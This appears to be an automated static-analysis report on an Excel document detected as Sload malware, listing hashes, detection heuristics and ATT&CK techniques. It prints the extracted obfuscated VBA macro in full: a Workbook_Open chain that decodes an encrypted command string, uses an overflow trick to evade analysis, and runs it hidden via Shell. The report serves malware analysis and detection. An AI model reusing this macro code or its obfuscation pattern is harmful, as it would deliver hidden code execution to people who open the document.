Sload — Office (OLE) malware analysis

Static analysis result for SHA-256 e81e4db6a360c99f…

MALICIOUS

Office (OLE)

57.5 KB Created: 2018-09-18 16:10:06 Authoring application: Microsoft Excel First seen: 2019-05-31
MD5: a628323455d1f19d1115e1626d1fabce SHA-1: 552f531d1f8cba28da5fcc376abbc5647f438c69 SHA-256: e81e4db6a360c99f1d8cf01dffa8dbe8268564049a95f9bbfc1e01e6ae74dabe
222 Risk Score

Malware Insights

Sload · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The file is an Excel document containing a Workbook_Open VBA macro. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary code. ClamAV detection confirms this as Sload malware. The VBA macro is heavily obfuscated, but the Workbook_Open and Shell() calls are clear indicators of malicious intent.

Heuristics 6

  • ClamAV: Xls.Malware.Sload-6786370-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Sload-6786370-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.day.com/dam/1.0 In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4054 bytes
SHA-256: 5918085136bf04836ee55b7cdfde877eaf0709e92a76ca7485b31452c744f946
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
pex2 = "pex2"
pex = top(pex2)
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "coprocessor"
Function top(PEXCEPTION_POINTERS)
ucontext_t.CmdLineParser = PEXCEPTION_POINTERS
End Function

Attribute VB_Name = "CYGWIN"
Function ULONG()
ucontext_t.malloc = a("m(j4)m4fdyuihzuvv4[]fdyuihzuvv4[[ka'mosd'4""u$}hois'l.4,hsbuodogv{\$'uy:d""xumo4hphou(-'uo-yu""mvsu'o{-jdy'vdgjksvu$,hsbuodogv%]] o(f _tdkoygiu-unu]]{|hogio:fidmuhh4]] o(f _tdkoygiu-unu]]|;oip\""u$]]zoof3))""mlkv-md()hj'-aty]]{;mgomz\""u$]]zoof3))a""us'm-md()hj'-aty]]{;][[424dao:ksvu4:u'mdjs'l4ghmss4:ksvufgoz4 o(f _tttttttttttttttttttt-""go|4hogio:fidmuhh4] o(f _tttttttttttttttttttt-""go]4:ys'jdyhopvu4zsjju'[")
dwVar = 2
On Error Resume Next
dwVar = CInt("30E+10000")
If dwVar = 2 Then
ucontext_t.signo = ucontext_t.malloc
End If
ULONG = 1
End Function

Attribute VB_Name = "specific"
Function a(NO_UNIX_BACKTRACE_SUPPORT)
further = ""
SIGFPE = 1
DWORD64 SIGFPE, further, NO_UNIX_BACKTRACE_SUPPORT
a = further
End Function

Function DWORD64(ByRef redistribute, ByRef low, mytstack)
licenses = Len(mytstack)
If redistribute <= licenses Then
low = low + up(Software(Right(Left(mytstack, redistribute), 1)), 4)
redistribute = redistribute + 1
DWORD64 redistribute, low, mytstack
End If
End Function

Function up(printing, settings)
If printing - settings < 1 Then
up = Right(Left(ucontext_t.SIGBUS, Len(ucontext_t.SIGBUS) + printing - settings), 1)
Else
up = Right(Left(ucontext_t.SIGBUS, printing - settings), 1)
End If
End Function

Function Software(fprintf)
bStackBelowHeap = 1
Windows1 = 1
strings bStackBelowHeap, Windows1, fprintf
Software = Windows1
End Function
  
Function strings(ByRef bStackBelowHeap, ByRef Windows, fprintf)
UNUSED = ucontext_t.SIGBUS
licenses = Len(UNUSED)
If bStackBelowHeap < licenses Then
    If fprintf <> Right(Left(UNUSED, bStackBelowHeap), 1) Then
    bStackBelowHeap = bStackBelowHeap + 1
    strings bStackBelowHeap, Windows, fprintf
    Else
    Windows = bStackBelowHeap
    End If
End If
End Function

Attribute VB_Name = "ucontext_t"
Attribute VB_Base = "0{08B9E9C0-6FFB-4718-8161-A87BACED206B}{A9B41FEF-6FD0-4F2E-9396-9B344E544D11}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub signo_Change()
without = ucontext_t.signo
dwVar = 100
dwVar = 99
dwVar = 98
dwVar = 97
dwVar = 96
dwVar = 95
dwVar = 94
dwVar = 93
dwVar = 92
dwVar = 91
dwVar = 90
dwVar = 89
dwVar = 88
dwVar = 87
dwVar = 86
dwVar = 85
dwVar = 84
dwVar = 83
dwVar = 82
dwVar = 81
dwVar = 80
dwVar = 79
dwVar = 78
dwVar = 0
Shell without, 0
End Sub

Private Sub CmdLineParser_Change()
ULONG
End Sub